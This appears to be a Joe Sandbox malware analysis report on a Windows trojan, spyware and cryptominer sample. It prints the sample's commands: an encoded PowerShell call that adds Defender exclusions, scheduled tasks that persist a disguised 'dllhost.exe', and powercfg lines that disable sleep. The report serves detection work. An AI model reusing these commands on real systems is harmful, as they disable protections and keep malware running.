Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C93840	2_2_00C93840
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C9F860	2_2_00C9F860
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CBC870	2_2_00CBC870
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CBD070	2_2_00CBD070
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C81000	2_2_00C81000
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE2800	2_2_00CE2800
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C9D810	2_2_00C9D810
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD6010	2_2_00CD6010
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CAE020	2_2_00CAE020
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8E030	2_2_00C8E030
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CBE9C0	2_2_00CBE9C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C841D0	2_2_00C841D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE41D0	2_2_00CE41D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8D1E0	2_2_00C8D1E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C88990	2_2_00C88990
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C9F190	2_2_00C9F190
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C901A0	2_2_00C901A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C989A0	2_2_00C989A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C96940	2_2_00C96940
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C99150	2_2_00C99150
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8B960	2_2_00C8B960
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB7170	2_2_00CB7170
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CED90A	2_2_00CED90A
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C9E900	2_2_00C9E900
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB0110	2_2_00CB0110
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD4110	2_2_00CD4110
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD6920	2_2_00CD6920
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB8130	2_2_00CB8130
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CF22CA	2_2_00CF22CA
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB22F0	2_2_00CB22F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA3A90	2_2_00CA3A90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA5290	2_2_00CA5290
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C97AA0	2_2_00C97AA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB8AA0	2_2_00CB8AA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C982B0	2_2_00C982B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE12B0	2_2_00CE12B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE7AB0	2_2_00CE7AB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C87240	2_2_00C87240
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB3A50	2_2_00CB3A50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC8A70	2_2_00CC8A70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA3200	2_2_00CA3200
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD1A00	2_2_00CD1A00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE2210	2_2_00CE2210
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE3A20	2_2_00CE3A20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CF8230	2_2_00CF8230
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC93D0	2_2_00CC93D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE93E0	2_2_00CE93E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CAABF0	2_2_00CAABF0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C9DB80	2_2_00C9DB80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C90B90	2_2_00C90B90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C91BA0	2_2_00C91BA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C9E3A0	2_2_00C9E3A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB53A0	2_2_00CB53A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD7BB0	2_2_00CD7BB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CCEB40	2_2_00CCEB40
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C97B50	2_2_00C97B50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CCA350	2_2_00CCA350
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD0350	2_2_00CD0350
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA9360	2_2_00CA9360
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8A300	2_2_00C8A300
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C87B00	2_2_00C87B00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C88310	2_2_00C88310
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C9B310	2_2_00C9B310
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA7320	2_2_00CA7320
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC1320	2_2_00CC1320
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CDBCC0	2_2_00CDBCC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD84C0	2_2_00CD84C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CEA4C0	2_2_00CEA4C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C854D0	2_2_00C854D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC4CB0	2_2_00CC4CB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C92450	2_2_00C92450
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA5450	2_2_00CA5450
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC6460	2_2_00CC6460
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C9EC70	2_2_00C9EC70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB3C70	2_2_00CB3C70
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA2C00	2_2_00CA2C00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE1C00	2_2_00CE1C00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C94C10	2_2_00C94C10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C9D410	2_2_00C9D410
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB3410	2_2_00CB3410
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C94430	2_2_00C94430
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C90430	2_2_00C90430
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD3430	2_2_00CD3430
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA55C0	2_2_00CA55C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C88DD0	2_2_00C88DD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CBF5D0	2_2_00CBF5D0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB7DD0	2_2_00CB7DD0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C90DE0	2_2_00C90DE0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC7DF0	2_2_00CC7DF0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00D05592	2_2_00D05592
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA2D80	2_2_00CA2D80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CBC5A0	2_2_00CBC5A0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8CD50	2_2_00C8CD50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CBB560	2_2_00CBB560
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE3D60	2_2_00CE3D60
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA9D00	2_2_00CA9D00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CDFD00	2_2_00CDFD00
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD9500	2_2_00CD9500
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C93510	2_2_00C93510
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CBFD20	2_2_00CBFD20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C89D30	2_2_00C89D30
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C96530	2_2_00C96530
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA3530	2_2_00CA3530
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C976C0	2_2_00C976C0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CBAEC0	2_2_00CBAEC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CBD6E0	2_2_00CBD6E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CB86E0	2_2_00CB86E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CCAEE0	2_2_00CCAEE0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8B6F0	2_2_00C8B6F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA66F0	2_2_00CA66F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC2E80	2_2_00CC2E80
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C89690	2_2_00C89690
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8E690	2_2_00C8E690
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD5690	2_2_00CD5690
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC3EA0	2_2_00CC3EA0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C816B0	2_2_00C816B0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA5EB0	2_2_00CA5EB0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE4640	2_2_00CE4640
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC9650	2_2_00CC9650
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8DE60	2_2_00C8DE60
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE9E60	2_2_00CE9E60
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8C610	2_2_00C8C610
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA0E10	2_2_00CA0E10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CE7E10	2_2_00CE7E10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C90620	2_2_00C90620
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CAFE20	2_2_00CAFE20
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA6FC0	2_2_00CA6FC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD2FC0	2_2_00CD2FC0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C827E0	2_2_00C827E0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CD07F0	2_2_00CD07F0
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CC6F90	2_2_00CC6F90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CDFF90	2_2_00CDFF90
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C99740	2_2_00C99740
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA1F50	2_2_00CA1F50
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00D03718	2_2_00D03718
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C8BF10	2_2_00C8BF10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00CA2F10	2_2_00CA2F10
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: 2_2_00C93F20	2_2_00C93F20
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Code function: 10_2_054BF2E4	10_2_054BF2E4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04E1B570	13_2_04E1B570
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04E1B550	13_2_04E1B550
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_08AB3F20	13_2_08AB3F20

Source: Joe Sandbox View

Dropped File: C:\ProgramData\Dllhost\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: String function: 0041ACC0 appears 85 times
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: String function: 00CEDE10 appears 97 times
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: String function: 00CF607C appears 44 times
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: String function: 0040B1D0 appears 47 times
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Code function: String function: 00CFAE24 appears 34 times

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 704

Source: winlogson.exe.10.dr

Static PE information: Number of sections : 11 > 10

Source: winlogson.exe.10.dr

Static PE information: No import functions for PE file found

Source: winlogson.exe.10.dr

Static PE information: Data appended to the last section found

Source: setupx 1.exe1.exe, 00000002.00000003.1308371180.0000000000FB4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTask32Main.exe@ vs setupx 1.exe1.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1308543577.0000000000FEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTask32Main.exe@ vs setupx 1.exe1.exe
Source: setupx 1.exe1.exe, 00000002.00000003.1308250372.0000000000FED000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTask32Main.exe@ vs setupx 1.exe1.exe

Source: setupx 1.exe1.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: setupx 1.exe1.exe	Static PE information: Section: .bss ZLIB complexity 1.0003259892086331
Source: setupx 1.exe1.exe	Static PE information: Section: .bss ZLIB complexity 1.0003259892086331

Source: WinRing0x64.sys.10.dr

Binary string: \Device\WinRing0_1_2_0

Source: classification engine

Classification label: mal100.troj.spyw.evad.mine.winEXE@33/17@2/3

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Code function: 2_2_00442800 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_00442800

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Mutant created: \Sessions\1\BaseNamedObjects\ProgramV3
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6676
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

File created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

Jump to behavior

Source: setupx 1.exe1.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: setupx 1.exe1.exe, 00000002.00000003.1035882521.00000000037C6000.00000004.00000800.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1058083015.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1036366767.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, setupx 1.exe1.exe, 00000002.00000003.1057734750.00000000037C2000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: setupx 1.exe1.exe	Virustotal: Detection: 65%
Source: setupx 1.exe1.exe	ReversingLabs: Detection: 65%

Source: C:\Users\user\Desktop\setupx 1.exe1.exe

File read: C:\Users\user\Desktop\setupx 1.exe1.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6676 -s 704
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe"
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA=="
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process created: C:\Users\user\Desktop\setupx 1.exe1.exe "C:\Users\user\Desktop\setupx 1.exe1.exe"	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Process created: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe "C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAFUAOQBvADAAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBpAHUASAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBtAFYAQgA1AGoAdgBvAGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAQwA4AFYAIwA+AA=="	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk8302" /TR "C:\ProgramData\Dllhost\dllhost.exe"

Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setupx 1.exe1.exe	Section loaded: uxtheme.dll	Jump to behavior
